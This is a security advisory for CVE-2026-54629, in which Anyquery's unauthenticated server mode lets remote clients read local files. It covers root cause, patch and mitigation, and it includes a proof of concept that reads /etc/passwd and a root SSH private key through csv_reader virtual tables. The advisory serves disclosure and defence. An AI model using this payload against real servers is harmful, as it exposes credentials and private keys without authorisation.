high · 7.5CVE-2026-54629Jul 14, 2026

CVE-2026-54629: Anyquery Local File Read via Unrestricted SQLite Virtual Table Modules

Rohit Hatagale
AI Security Researcher, SecureLayer7

When Anyquery is run in server mode, any unauthenticated remote client can read arbitrary local files by creating a SQLite virtual table that points to a sensitive path like /etc/passwd or ~/.ssh/id_r

Packagegithub.com/julien040/anyquery
Ecosystemgo
Affected< 0.4.5

The problem

Anyquery's `server` mode exposes a MySQL-compatible TCP port and accepts raw SQLite DDL from any connecting client. The server applies no access control over built-in virtual table modules such as `csv_reader`, `log_reader`, or `json_reader`.

Because there is no authentication requirement and no path restriction, an attacker on the network can instantiate a virtual table pointing to any file the server process can read. Full confidentiality of the local filesystem is at risk. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Proof of concept

A working proof-of-concept for CVE-2026-54629 in github.com/julien040/anyquery, with the exact payload below.

sql
-- 1. Victim starts server (default or explicit bind)
anyquery server --host 0.0.0.0 --port 8070

-- 2. Attacker connects (no password required)
mysql -u root -h <VICTIM_IP> -P 8070

-- 3. Create virtual table pointing at a sensitive file
CREATE VIRTUAL TABLE passwd USING csv_reader('/etc/passwd');
SELECT * FROM passwd;

-- Works equally for other built-in modules:
CREATE VIRTUAL TABLE ssh_key USING csv_reader('/root/.ssh/id_rsa');
SELECT * FROM ssh_key;

The root cause is a complete absence of authorization and path sandboxing in the server query handler. SQLite virtual table modules are registered at engine startup and remain callable by any connected session. There is no check on which modules a remote (unauthenticated) client may invoke, and file paths passed to `csv_reader` and sibling modules are opened directly by the server process without any allow-list or directory confinement.

The patch in 0.4.5 introduces a sandboxing mechanism that restricts `read_*` operations to designated directories when running in server mode, blocking arbitrary absolute paths from being passed to these modules. CWE-22 (Path Traversal) and CWE-862 (Missing Authorization) both apply here.

The fix

Upgrade to anyquery >= 0.4.5. The 0.4.5 release adds path sandboxing for file-reader virtual table modules in server mode, preventing access to paths outside an allowed set. Until you can upgrade, either avoid exposing `anyquery server` to untrusted networks or bind strictly to localhost (`--host 127.0.0.1`) and enforce network-level access controls.

Reporter not attributed.

References: [1][2][3]

Related research